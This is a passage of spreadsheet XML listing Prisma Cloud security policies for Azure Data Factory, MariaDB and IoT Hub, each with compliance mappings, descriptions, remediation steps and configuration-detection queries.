      <c r="D2250" t="inlineStr"/>
      <c r="E2250" t="inlineStr"/>
      <c r="F2250" t="inlineStr"/>
      <c r="G2250" t="b">
        <v>1</v>
      </c>
      <c r="H22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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2250" t="inlineStr">
        <is>
          <t>azure-data-factory</t>
        </is>
      </c>
      <c r="K2250" t="inlineStr">
        <is>
          <t>Azure Data Factory (V2) is not configured with managed identity</t>
        </is>
      </c>
      <c r="L2250" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2250" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2250" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2250" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2250" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2250" t="inlineStr">
        <is>
          <t>Principle 6</t>
        </is>
      </c>
      <c r="R2250" t="inlineStr">
        <is>
          <t>6.2.5</t>
        </is>
      </c>
      <c r="S2250" t="inlineStr"/>
      <c r="T2250" t="b">
        <v>0</v>
      </c>
      <c r="U2250" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2250" t="inlineStr">
        <is>
          <t>azure-data-factory-v2</t>
        </is>
      </c>
      <c r="W2250" t="inlineStr">
        <is>
          <t>This policy identifies Data Factories (V2)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Data Factory.</t>
        </is>
      </c>
      <c r="X2250" t="inlineStr">
        <is>
          <t>1. Login to Azure portal.
2. Navigate to 'Data factories'
3. Click on the reported Data factory
4. Select 'Managed identities' under 'Settings' from left panel 
5. Configure either 'System assigned' or 'User assigned' identity
For more on Data factories managed identities refer https://docs.microsoft.com/en-gb/azure/data-factory/data-factory-service-identity?tabs=data-factory
6. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2250" t="inlineStr"/>
      <c r="Z2250" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-data-factory-v2' AND json.rule = properties.provisioningState equal ignore case Succeeded and identity does not exist or identity.type equal ignore case "None"</t>
        </is>
      </c>
      <c r="AA2250" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2250" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2250" t="inlineStr">
        <is>
          <t>PC-AZR-ADF-902</t>
        </is>
      </c>
      <c r="AD2250" t="b">
        <v>1</v>
      </c>
      <c r="AE2250" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2250" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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0" t="inlineStr">
        <is>
          <t>e4c03c2b-b872-43f1-bfba-62ff056ed84b</t>
        </is>
      </c>
      <c r="AI2250" t="inlineStr">
        <is>
          <t>3e5a7f03-32a7-4c45-883c-81f741c434af</t>
        </is>
      </c>
      <c r="AJ2250" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2250" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2251">
      <c r="A2251" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, ISO/IEC 27001:2022, NIST 800-53 Rev 5, NIST SP 800-171 Revision 3, HITRUST CSF v.11.2.0, Secure Controls Framework (SCF) - 2022.2.1, HIPAA, Insurance Regulatory And Development Authority Of India, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, MLPS 2.0 (Level 2), SOC 2, SOC 2, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 1, ISO/IEC 27001:2022</t>
        </is>
      </c>
      <c r="B2251" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2251" s="2" t="inlineStr"/>
      <c r="D2251" t="inlineStr"/>
      <c r="E2251" t="inlineStr"/>
      <c r="F2251" t="inlineStr"/>
      <c r="G2251" t="b">
        <v>1</v>
      </c>
      <c r="H22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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2251" t="inlineStr">
        <is>
          <t>azure-data-factory</t>
        </is>
      </c>
      <c r="K2251" t="inlineStr">
        <is>
          <t>Azure Data Factory (V2) configured with overly permissive network access</t>
        </is>
      </c>
      <c r="L2251" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2251" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2251" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2251" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2251" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2251" t="inlineStr">
        <is>
          <t>Organisational Controls</t>
        </is>
      </c>
      <c r="R2251" t="inlineStr">
        <is>
          <t>A5.15</t>
        </is>
      </c>
      <c r="S2251" t="inlineStr"/>
      <c r="T2251" t="b">
        <v>0</v>
      </c>
      <c r="U2251" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2251" t="inlineStr">
        <is>
          <t>azure-data-factory-v2</t>
        </is>
      </c>
      <c r="W2251" t="inlineStr">
        <is>
          <t>This policy identifies Data factories (V2) configured with overly permissive network access. A Data factory managed virtual network along with managed private endpoints protects against data exfiltration. It is recommended to configure the Data factory with a private endpoint; so that the Data factory is accessible only to restricted entities.</t>
        </is>
      </c>
      <c r="X2251" t="inlineStr">
        <is>
          <t>1. Login to Azure portal
2. Navigate to 'Data factories'
3. Click on the reported Data factory
4. Select 'Networking' under 'Settings' from left panel 
5. In 'Private endpoint connections' tab, Create a private endpoint as per your requirement.
6. Once Private endpoint is created; In 'Network access' tab, Select the 'Private endpoint'
7. Click on 'Save' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-data-factory-public-network-access-is-disabled
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-data-factory-public-network-access-is-disabled</t>
        </is>
      </c>
      <c r="Y2251" t="inlineStr"/>
      <c r="Z2251" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-data-factory-v2' AND json.rule = properties.provisioningState equal ignore case Succeeded and properties.publicNetworkAccess equal ignore case Enabled
{"category":"Networking","resourceTypes":["azurerm_data_factory"]}</t>
        </is>
      </c>
      <c r="AA2251" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2251" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2251" t="inlineStr">
        <is>
          <t>PC-AZR-ADF-904-CKV_AZURE_104</t>
        </is>
      </c>
      <c r="AD2251" t="b">
        <v>1</v>
      </c>
      <c r="AE2251" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2251" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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1" t="inlineStr">
        <is>
          <t>d96a6d5b-0399-45dc-8fac-db55d711710b</t>
        </is>
      </c>
      <c r="AI2251" t="inlineStr">
        <is>
          <t>c181a29b-b48e-4fd1-ab10-80bd7f930093</t>
        </is>
      </c>
      <c r="AJ2251" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2251" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2252">
      <c r="A2252" t="inlineStr">
        <is>
          <t>DM_TEST</t>
        </is>
      </c>
      <c r="B2252" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2252" s="2" t="inlineStr"/>
      <c r="D2252" t="inlineStr"/>
      <c r="E2252" t="inlineStr"/>
      <c r="F2252" t="inlineStr"/>
      <c r="G2252" t="b">
        <v>0</v>
      </c>
      <c r="H22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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2252" t="inlineStr">
        <is>
          <t>azure-database-maria</t>
        </is>
      </c>
      <c r="K2252" t="inlineStr">
        <is>
          <t>Test-pk</t>
        </is>
      </c>
      <c r="L2252" t="inlineStr"/>
      <c r="M2252" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2252" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2252" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2252" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2252" t="inlineStr">
        <is>
          <t>Identity</t>
        </is>
      </c>
      <c r="R2252" t="inlineStr">
        <is>
          <t>SSH Traffic for ingress and egress</t>
        </is>
      </c>
      <c r="S2252" t="inlineStr"/>
      <c r="T2252" t="b">
        <v>0</v>
      </c>
      <c r="U2252" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2252" t="inlineStr">
        <is>
          <t>azure-database-maria-db-server</t>
        </is>
      </c>
      <c r="W2252" t="inlineStr"/>
      <c r="X2252" t="inlineStr"/>
      <c r="Y2252" t="inlineStr"/>
      <c r="Z2252" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-database-maria-db-server' AND json.rule = properties.userVisibleState equal ignore case Ready and properties.privateEndpointConnections[*] is empty</t>
        </is>
      </c>
      <c r="AA2252" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB2252" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2252" t="inlineStr"/>
      <c r="AD2252" t="b">
        <v>0</v>
      </c>
      <c r="AE2252" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2252" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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2" t="inlineStr">
        <is>
          <t>83413d83-5404-47db-a581-d07b75efffbd</t>
        </is>
      </c>
      <c r="AI2252" t="inlineStr">
        <is>
          <t>8440e939-154b-4ae0-8736-67963cc33d07</t>
        </is>
      </c>
      <c r="AJ2252" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2252" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2253">
      <c r="A2253" t="inlineStr">
        <is>
          <t>HIPAA, CIS Controls v8, ISO/IEC 27001:2022, ISO/IEC 27001:2022, CSA CCM v.4.0.6, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CSA CCM v.4.0.6, ISO 27002:2022, New Zealand Information Security Manual (NZISM v3.4), Secure Controls Framework (SCF) - 2024.2, CIS Controls v8.1, CSA CCM v4.0.12, CIS Controls v7.1, CSA CCM v.4.0.6, Copy of New Zealand Information Security Manual (NZISM v3.4), ACSC Information Security Manual (ISM), CSA CCM v.4.0.6, ISO 27002:2022, SOC 2, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, TX-RAMP Level 1, CIS Controls v7.1, DORA, CSA CCM v4.0.12, kashan ACSC Information Security Manual (ISM), Microsoft Cloud Security Benchmark v1, FFIEC, Copy of CIS Controls v8, ISO/IEC 27001:2022, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), ITSG-33, RBI Baseline Cyber Security and Resilience Requirements, SOC 2, GDPR, kfirdaus AWS Account-CS, HIPAA, SOC 2, CSA CCM v.4.0.6, ISO/IEC 27001:2022, CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2022.2.1, CIS Controls v8.1, PCI DSS v4.0, TX-RAMP Level 2, ISO 27002:2022, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2253" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2253" s="2" t="inlineStr"/>
      <c r="D2253" t="inlineStr"/>
      <c r="E2253" t="inlineStr"/>
      <c r="F2253" t="inlineStr"/>
      <c r="G2253" t="b">
        <v>1</v>
      </c>
      <c r="H22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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2253" t="inlineStr">
        <is>
          <t>azure-database-maria</t>
        </is>
      </c>
      <c r="K2253" t="inlineStr">
        <is>
          <t>Azure MariaDB database server not using latest TLS version</t>
        </is>
      </c>
      <c r="L2253" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2253" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2253" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2253" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2253" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2253" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R2253" t="inlineStr">
        <is>
          <t>ISM-1139</t>
        </is>
      </c>
      <c r="S2253" t="inlineStr"/>
      <c r="T2253" t="b">
        <v>0</v>
      </c>
      <c r="U2253" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2253" t="inlineStr">
        <is>
          <t>azure-database-maria-db-server</t>
        </is>
      </c>
      <c r="W2253" t="inlineStr">
        <is>
          <t>This policy identifies Azure MariaDB database servers that are not using the latest TLS version for SSL enforcement. Azure Database for MariaDB uses Transport Layer Security (TLS) from communication with client applications. As a best security practice, use the newer TLS version as the minimum TLS version for the MariaDB database server. Currently, Azure MariaDB supports TLS 1.2 version which resolves the security gap from its preceding versions.</t>
        </is>
      </c>
      <c r="X2253" t="inlineStr">
        <is>
          <t>To configure SSL connection with latest TLS version on an existing Azure Database for MariaDB, follow the below URL:
https://docs.microsoft.com/en-us/azure/mariadb/howto-tls-configurations
NOTE: Once you enforce a minimum TLS version, you cannot later disable minimum version enforcement. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-2-37
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-2-37</t>
        </is>
      </c>
      <c r="Y2253" t="inlineStr"/>
      <c r="Z2253" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-database-maria-db-server' AND json.rule = properties.userVisibleState equals Ready and properties.sslEnforcement equals Enabled and properties.minimalTlsVersion does not equal TLS1_2
{"category":"General","resourceTypes":["azurerm_mariadb_server"]}</t>
        </is>
      </c>
      <c r="AA2253" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2253" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2253" t="inlineStr">
        <is>
          <t>PC-AZR-AMD-847-CKV2_AZURE_37</t>
        </is>
      </c>
      <c r="AD2253" t="b">
        <v>1</v>
      </c>
      <c r="AE2253" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2253" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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3" t="inlineStr">
        <is>
          <t>ba4d0c4a-e02b-4f89-a916-f5fdfeb83f7a</t>
        </is>
      </c>
      <c r="AI2253" t="inlineStr">
        <is>
          <t>b131d726-d82a-4cbd-9f29-68e3ac2ed8a4</t>
        </is>
      </c>
      <c r="AJ2253" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2253" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2254">
      <c r="A2254" t="inlineStr">
        <is>
          <t>PCI DSS v4.0, ISO/IEC 27001:2022, CRI Profile v2.0, NIST CSF v2.0, Insurance Regulatory And Development Authority Of India, ACSC Information Security Manual (ISM), NIST 800-53 Rev 5, FFIEC, ITSG-33, CRI Profile v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CIS Controls v7.1, CRI Profile v1.2.1, Copy of CIS Controls v8, ISO 27002:2022, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, CIS Controls v7.1, PCI DSS v4.0, ACSC Information Security Manual (ISM), DORA, NIST CSF v2.0, TX-RAMP Level 2, PCI DSS v4.0, PCI DSS v4.0, kfirdaus AWS Account-CS, kfirdaus AWS Account-CS, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CIS Controls v8.1, Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), kashan ACSC Information Security Manual (ISM), CRI Profile v1.2.1, SOC 2, Secure Controls Framework (SCF) - 2022.2.1, CRI Profile v2.0, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, NYDFS 23 CRR-NY 500.0, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v8, kashan ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2024.2, RBI Baseline Cyber Security and Resilience Requirements, PCI DSS v4.0</t>
        </is>
      </c>
      <c r="B2254" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2254" s="2" t="inlineStr"/>
      <c r="D2254" t="inlineStr"/>
      <c r="E2254" t="inlineStr"/>
      <c r="F2254" t="inlineStr"/>
      <c r="G2254" t="b">
        <v>1</v>
      </c>
      <c r="H22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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2254" t="inlineStr">
        <is>
          <t>azure-database-maria</t>
        </is>
      </c>
      <c r="K2254" t="inlineStr">
        <is>
          <t>Azure MariaDB database server with SSL connection disabled</t>
        </is>
      </c>
      <c r="L2254" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2254" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2254" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2254" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2254" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2254" t="inlineStr">
        <is>
          <t>Guidelines for Software Development</t>
        </is>
      </c>
      <c r="R2254" t="inlineStr">
        <is>
          <t>ISM-1552</t>
        </is>
      </c>
      <c r="S2254" t="inlineStr"/>
      <c r="T2254" t="b">
        <v>0</v>
      </c>
      <c r="U2254" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2254" t="inlineStr">
        <is>
          <t>azure-database-maria-db-server</t>
        </is>
      </c>
      <c r="W2254" t="inlineStr">
        <is>
          <t>This policy identifies MariaDB database servers for which SSL enforce status is disabled. Azure Database for MariaDB supports connecting your Azure Database for MariaDB server to client applications using Secure Sockets Layer (SSL). Enforcing SSL connections between your database server and your client applications helps protect against 'man in the middle' attacks by encrypting the data stream between the server and your application. It is recommended to enforce SSL for accessing your database server.</t>
        </is>
      </c>
      <c r="X2254" t="inlineStr">
        <is>
          <t>To configure SSL connection on an existing Azure Database for MariaDB, follow the below URL:
https://docs.microsoft.com/en-us/azure/mariadb/howto-configure-ssl 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-17
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-17</t>
        </is>
      </c>
      <c r="Y2254" t="inlineStr"/>
      <c r="Z2254" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-database-maria-db-server' AND json.rule = properties.userVisibleState equals Ready and properties.sslEnforcement equals Disabled
{"category":"Networking","resourceTypes":["azurerm_mariadb_server"]}</t>
        </is>
      </c>
      <c r="AA2254" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2254" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2254" t="inlineStr">
        <is>
          <t>PC-AZR-AMD-846-CKV_AZURE_47</t>
        </is>
      </c>
      <c r="AD2254" t="b">
        <v>1</v>
      </c>
      <c r="AE2254" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2254" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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4" t="inlineStr">
        <is>
          <t>57d0cd4e-e3ce-4ef2-83ec-97f6b5ac24b3</t>
        </is>
      </c>
      <c r="AI2254" t="inlineStr">
        <is>
          <t>221dd55b-2020-4d55-a8d2-b51a74efaa56</t>
        </is>
      </c>
      <c r="AJ2254" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2254" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2255">
      <c r="A2255" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2255" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2255" s="2" t="inlineStr"/>
      <c r="D2255" t="inlineStr"/>
      <c r="E2255" t="inlineStr"/>
      <c r="F2255" t="inlineStr"/>
      <c r="G2255" t="b">
        <v>1</v>
      </c>
      <c r="H22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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2255" t="inlineStr">
        <is>
          <t>azure-database-maria</t>
        </is>
      </c>
      <c r="K2255" t="inlineStr">
        <is>
          <t>Azure Database for MariaDB not configured with private endpoint</t>
        </is>
      </c>
      <c r="L2255" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2255" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2255" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2255" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2255" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2255" t="inlineStr">
        <is>
          <t>NS</t>
        </is>
      </c>
      <c r="R2255" t="inlineStr">
        <is>
          <t>NS-2</t>
        </is>
      </c>
      <c r="S2255" t="inlineStr"/>
      <c r="T2255" t="b">
        <v>0</v>
      </c>
      <c r="U2255" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2255" t="inlineStr">
        <is>
          <t>azure-database-maria-db-server</t>
        </is>
      </c>
      <c r="W2255" t="inlineStr">
        <is>
          <t>This policy identifies Azure MariaDB database servers that are not configured with private endpoint. Private endpoint connections enforce secure communication by enabling private connectivity to Azure Database for MariaDB. Configuring a private endpoint enables access to traffic coming from only known networks and prevents access from malicious or unknown IP addresses which includes IP addresses within Azure. It is recommended to create private endpoint for secure communication for your Azure MariaDB database.</t>
        </is>
      </c>
      <c r="X2255" t="inlineStr">
        <is>
          <t>To configure private endpoint for MariaDB, follow below URL:
https://learn.microsoft.com/en-us/azure/mariadb/howto-configure-privatelink-portal 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-2-43
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-2-43</t>
        </is>
      </c>
      <c r="Y2255" t="inlineStr"/>
      <c r="Z2255" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-database-maria-db-server' AND json.rule = properties.userVisibleState equal ignore case Ready and properties.privateEndpointConnections[*] is empty
{"category":"General","resourceTypes":["azurerm_mariadb_server"]}</t>
        </is>
      </c>
      <c r="AA2255" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2255" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2255" t="inlineStr">
        <is>
          <t>PC-AZR-AMD-1066-CKV2_AZURE_43</t>
        </is>
      </c>
      <c r="AD2255" t="b">
        <v>1</v>
      </c>
      <c r="AE2255" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2255" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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5" t="inlineStr">
        <is>
          <t>4c9e653c-2110-4719-b333-be3d8d078b71</t>
        </is>
      </c>
      <c r="AI2255" t="inlineStr">
        <is>
          <t>d22487ed-9b42-451d-9321-d8471e2e46c3</t>
        </is>
      </c>
      <c r="AJ2255" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2255" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2256">
      <c r="A2256" t="inlineStr">
        <is>
          <t>CIS v2.0.0 (Azure) Level 2, NYDFS 23 CRR-NY 500.0, CIS v2.1.0 (Azure) Level 2</t>
        </is>
      </c>
      <c r="B2256" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2256" s="2" t="inlineStr"/>
      <c r="D2256" t="inlineStr"/>
      <c r="E2256" t="inlineStr"/>
      <c r="F2256" t="inlineStr"/>
      <c r="G2256" t="b">
        <v>1</v>
      </c>
      <c r="H22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56" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2256" t="inlineStr">
        <is>
          <t>azure-devices-iot</t>
        </is>
      </c>
      <c r="K2256" t="inlineStr">
        <is>
          <t>Azure Microsoft Defender for IoT Hub not enabled</t>
        </is>
      </c>
      <c r="L2256" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2256" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2256" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2256" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2256" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2256" t="inlineStr">
        <is>
          <t>Microsoft Defender</t>
        </is>
      </c>
      <c r="R2256" t="inlineStr">
        <is>
          <t>2.2.1</t>
        </is>
      </c>
      <c r="S2256" t="inlineStr"/>
      <c r="T2256" t="b">
        <v>0</v>
      </c>
      <c r="U2256" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2256" t="inlineStr">
        <is>
          <t>azure-devices-iot-hub-resource</t>
        </is>
      </c>
      <c r="W2256" t="inlineStr">
        <is>
          <t>This policy identifies Azure IoT Hubs without Microsoft Defender for IoT enabled.
Azure IoT Hub is a managed service that acts as a central message hub for communication between IoT applications and IoT devices. Without Microsoft Defender for IoT enabled, IoT devices and hubs are more vulnerable to security threats. This increases the risk of unauthorized access, data breaches, and compromised IoT devices, which can lead to operational and security challenges.
As best practice, it is recommended to enable Microsoft Defender for IoT on your Azure IoT Hub. This enhances the security posture of your IoT solutions by providing continuous monitoring, threat detection, and automated response capabilities to protect against cyber threats.</t>
        </is>
      </c>
      <c r="X2256" t="inlineStr">
        <is>
          <t>To enable Microsoft Defender for IoT on Azure IoT Hub follow the below URL:
https://learn.microsoft.com/en-us/azure/defender-for-iot/device-builders/quickstart-onboard-iot-hub#enable-defender-for-iot-on-an-existing-iot-hub</t>
        </is>
      </c>
      <c r="Y2256" t="inlineStr"/>
      <c r="Z2256" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-devices-iot-hub-resource' AND json.rule = properties.provisioningState equal ignore case "Succeeded" as X; config from cloud.resource where api.name = 'azure-iot-security-solutions' AND json.rule = properties.status equal ignore case "Enabled" as Y; filter 'not $.Y.properties.iotHubs contains $.X.id'; show X;</t>
        </is>
      </c>
      <c r="AA2256" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2256" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2256" t="inlineStr">
        <is>
          <t>PC-AZR-AIH-1245</t>
        </is>
      </c>
      <c r="AD2256" t="b">
        <v>1</v>
      </c>
      <c r="AE2256" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2256" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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56" t="inlineStr">
        <is>
          <t>f0928166-9f42-4f0b-9710-352fa3f06df1</t>
        </is>
      </c>
      <c r="AI2256" t="inlineStr">
        <is>
          <t>4b284c35-1b07-4482-a32f-c27d07cc1336</t>
        </is>
      </c>
      <c r="AJ2256" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2256" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2257">
      <c r="A2257" t="inlineStr">
        <is>
